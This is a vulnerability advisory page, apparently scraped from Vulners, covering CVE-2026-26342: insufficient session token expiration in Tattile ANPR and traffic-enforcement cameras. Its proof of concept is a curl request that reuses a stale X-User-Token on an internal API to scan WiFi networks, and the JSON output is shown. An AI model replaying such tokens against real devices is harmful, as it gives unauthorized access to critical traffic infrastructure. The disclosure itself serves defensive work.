Vulners
Lucene search
đ Tattile Cameras 1.181.5 Insufficient Token Expiration
đď¸Â 24 Feb 2026 00:00:00Reported by LiquidWormType 
 packetstormđ packetstorm.newsđ 126 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2026-26342 | 24 Feb 202618:41 | â | attackerkb |
 | CVE-2026-26342 | 24 Feb 202621:43 | â | circl |
 | Tattile Smart+ 䝣ç éŽé˘ćźć´ | 24 Feb 202600:00 | â | cnnvd |
 | CVE-2026-26342 | 24 Feb 202618:41 | â | cve |
 | CVE-2026-26342 Tattile Smart+ / Vega / Basic <= 1.181.5 Insufficient Session Token Expiration | 24 Feb 202618:41 | â | cvelist |
 | CVE-2026-26342 | 24 Feb 202620:27 | â | nvd |
 | PT-2026-21790 | 24 Feb 202600:00 | â | ptsecurity |
 | CVE-2026-26342 | 25 Feb 202622:17 | â | redhatcve |
 | CVE-2026-26342 Tattile Smart+ / Vega / Basic <= 1.181.5 Insufficient Session Token Expiration | 24 Feb 202618:41 | â | vulnrichment |
 | Tattile Cameras 1.181.5 Insufficient Token (X-User-Token) Expiration | 24 Feb 202600:00 | â | zeroscience |
10
Tattile Cameras 1.181.5 Insufficient Token (X-User-Token) Expiration
Vendor: Tattile s.r.l.
Product web page: https://www.tattile.com
Affected version: Smart+ family: Smart+
Tolling+
Smart+ Speed
Smart+ Traffic Light
Vega family: Axle Counter
Vega 53
Vega33 & Vega 11
Basic family: Basic MK2
ANPR Mobile
Firmware: 1.181.5
Summary: Tattile is an Italian manufacturer specializing in advanced
ANPR/ALPR, trafficâenforcement, and machineâvision camera systems used
across intelligent transportation networks, tolling infrastructures,
accessâcontrol environments, and industrial automation. Their portfolio
includes highâperformance ITS cameras capable of vehicle identification,
speed and redâlight enforcement, freeâflow tolling, and multiâlane traffic
monitoring, as well as compact ANPR units for parking and perimeter control,
and industrial smart cameras for inspection and quality assurance. Across
all model families, Tattile devices combine ruggedized hardware with onboard
image processing, AIâbased vehicle analytics, and highâsensitivity sensors
designed for continuous operation in demanding outdoor conditions, making
them critical components in modern traffic management and enforcement
architectures.
Desc: The application suffers an insufficient session expiration. This occurs
when the web application permits an attacker to reuse old session credentials
or tokens for authorization. Insufficient session expiration increases the
device's exposure to attacks that can steal or reuse user's session identifiers.
Tested on: lighttpd/1.4.64
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2026-5976
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5976.php
CVE ID: CVE-2026-26342
CVE URL: https://www.cve.org/CVERecord?id=CVE-2026-26342
22.01.2026
--
$ curl -k "https://cameraIP/api/__internal__/__hal__/wifi/network/scan" \
> -H "X-User-Token: dfaf1d9c-3ef6-442e-70f2-0f86f965542b"
[
{
"encryption": "WPA/WPA2",
"essid": "QuantumOverflow",
"signal_quality": 60
},
{
"encryption": "WPA2",
"essid": "PacketSorcery",
"signal_quality": 78
},
{
"encryption": "WPA2",
"essid": "Jovanovic",
"signal_quality": 70
},
{
"encryption": "WPA/WPA2",
"essid": "TP-31337",
"signal_quality": 50
},
{
"encryption": "WPA/WPA2",
"essid": "entropyengine",
"signal_quality": 57
},
{
"encryption": "WPA2",
"essid": "DarkMatterLAN",
"signal_quality": 71
},
{
"encryption": "WPA2",
"essid": "hexadecimalHavoc",
"signal_quality": 54
},
{
"encryption": "WPA2",
"essid": "neural-nexus",
"signal_quality": 60
},
{
"encryption": "WPA2",
"essid": "ZSL_Guest",
"signal_quality": 57
},
{
"encryption": "WPA2",
"essid": "WIFI_CORP",
"signal_quality": 68
},
{
"encryption": "WPA2",
"essid": "WLAN_MDM",
"signal_quality": 67
},
{
"encryption": "WPA2",
"essid": "ForbiddenFrequency",
"signal_quality": 67
},
{
"encryption": "WPA/WPA2",
"essid": "sagemcomFC00",
"signal_quality": 54
},
{
"encryption": "WPA/WPA2",
"essid": "vodafone1760",
"signal_quality": 57
},
{
"encryption": "WPA/WPA2",
"essid": "It hurts when IP",
"signal_quality": 54
},
{
"encryption": "WPA/WPA2",
"essid": "ZiggoF14256",
"signal_quality": 71
},
{
"encryption": "WPA2",
"essid": "vodafoneAA60QK",
"signal_quality": 58
},
{
"encryption": "WPA2",
"essid": "Deco1",
"signal_quality": 55
},
{
"encryption": "WPA/WPA2",
"essid": "zeroscience.mk",
"signal_quality": 58
},
{
"encryption": "WPA/WPA2",
"essid": "ddeshka",
"signal_quality": 67
}
]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Feb 2026 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 3.19.8
CVSS 48.7
EPSS0.00716
SSVC